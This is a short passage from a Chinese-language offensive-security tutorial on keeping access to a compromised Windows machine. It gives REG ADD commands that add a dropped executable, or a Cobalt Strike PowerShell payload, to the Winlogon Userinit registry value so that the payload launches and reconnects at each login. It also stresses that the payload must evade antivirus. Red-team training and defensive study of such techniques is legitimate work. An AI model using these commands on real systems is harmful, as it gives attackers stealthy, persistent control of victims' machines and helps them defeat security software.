6.1.2. 修改注册表
这里是需要权限的,使用普通用户的权限可能无法执行,所以依旧需要提权后操作。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,C:\1\3000.exe"
可以看到重启或者锁屏后重新登陆即可上线。
这里是采用cs中的payload进行上线。
6.2.1. 生成payload这里选择有效载荷》payload生成器》选择监听器》类型选择powershell command。
这里一定要注意payload一定要免*,否则百分比会被*。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,payload" ##要注意这个payload就是将cs生成的paylod复制上去,由于太大了,就不输入了。
